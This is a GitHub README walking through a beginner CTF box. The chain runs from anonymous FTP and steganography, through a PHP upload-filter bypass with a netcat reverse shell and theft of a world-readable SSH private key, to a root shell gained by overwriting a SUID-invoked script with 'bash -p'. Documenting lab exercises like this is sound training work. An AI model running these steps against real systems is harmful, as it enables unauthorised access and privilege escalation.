Skip to content

mohammadajani/LazZyCorp

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

4 Commits
README.md
README.md
Β 
Β 

Repository files navigation

LaZzyCorp: Lazy Reset

By ItsMhaa

Welcome to DevCorp β€” where mistakes are meant to be reset.

In this easy-to-medium difficulty CTF, you step into the shoes of a security researcher investigating a careless developer’s internal staging machine.

What starts with anonymous FTP access slowly unravels into a multi-step chain of steganography, web exploitation, SSH hijacking, and a SUID binary that resets more than just the website 😏

Box Information

Name: LaZzyCorp: Lazy Reset
Difficulty: Easy-Medium
Creator: ItsMhaa
OS: Ubuntu 20.04
IP: [Dynamic/Static – e.g., 192.168.1.150]

Story

DevCorp is a startup working on a blog platform. Their junior dev, Arvind, has been testing things on a local server β€” but in classic lazy fashion, he’s left behind:

  • Sensitive developer notes
  • A hidden image in FTP
  • His personal SSH key
  • And worst of all… a reset tool that runs as root 🧨

Your goal?

Pivot from anonymous FTP to full root by chaining together misconfigs, forgotten files, and one poorly secured script.

Summary

A misconfigured FTP server and a lazy reset tool set the stage for your exploitation path.

Expect a mix of:

  • Steganography
  • Upload bypasses
  • Permission abuse
  • A clean privilege escalation path
  • Minimal guesswork, maximum fun!

Step 1 – Recon Phase

  • Run nmap β†’ open ports: 21 (FTP), 80 (HTTP), 22 (SSH)

  • Try anonymous FTP β†’ Success

  • Inside /pub/, you find:

    βœ… note.jpg

    (Note:- Make sure while downloading file you use binary mode of FTP. )

Step 2 – Steganography & Foothold

  • Extract hidden data using:

    steghide extract -sf note.jpg

  • Hidden creds discovered inside:

    Username: dev
Password: ****

  • Visit the site β†’ /login

  • Upload shell.php using extension bypass: .php.upload

  • Start listener:

    nc -lvnp 4444

  • Trigger uploaded shell β†’ gain reverse shell as www-data

Step 3 – User Escalation (SSH as Arvind)

  • While in shell:

    cat /home/arvind/.ssh/id_rsa

  • File is world-readable

  • Copy it to your attacker box β†’ Save as id_rsa β†’ chmod 600 id_rsa

  • SSH into:

    ssh -i id_rsa arvind@<target-ip>

Step 4 – Privilege Escalation (SUID Reset)

  • List SUID binaries:

    find / -perm -4000 2>/dev/null

  • You find:

    /home/arvind/reset

  • It runs:

    /usr/bin/reset_site.sh

  • And that file is writable by arvind

  • Modify it:

    echo 'bash -p' > /usr/bin/reset_site.sh

  • Now run:

    /home/arvind/reset

  • BOOM β†’ Root shell

Step 5 – Flags

/home/arvind/user.txt   β†’  FLAG{****}

/root/root.txt          β†’  FLAG{*****}

🧠 What You Learned

βœ… Steganography + FTP

βœ… Web login & PHP upload bypass

βœ… Reading SSH keys from web shells

βœ… SSH pivoting

βœ… SUID + script poisoning for root access

πŸ’¬ Final Thoughts

This box was made for:

  • Beginners learning post-exploitation
  • People wanting story-based lateral movement
  • CTF lovers who enjoy clean logic over rabbit holes

Made with ❀️ by ItsMhaa

LinkedIn: www.linkedin.com/in/mohammad-husain-ajani

GitHub: https://github.com/mohammadajani/mohammadajani

Notion Walkthrough: LaZzyCorp: Lazy Reset

About

A Lore page for The LazZyCorp CTF machine.

Topics

ctf-writeups ctf-solutions hackmyvm lazzycorp

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors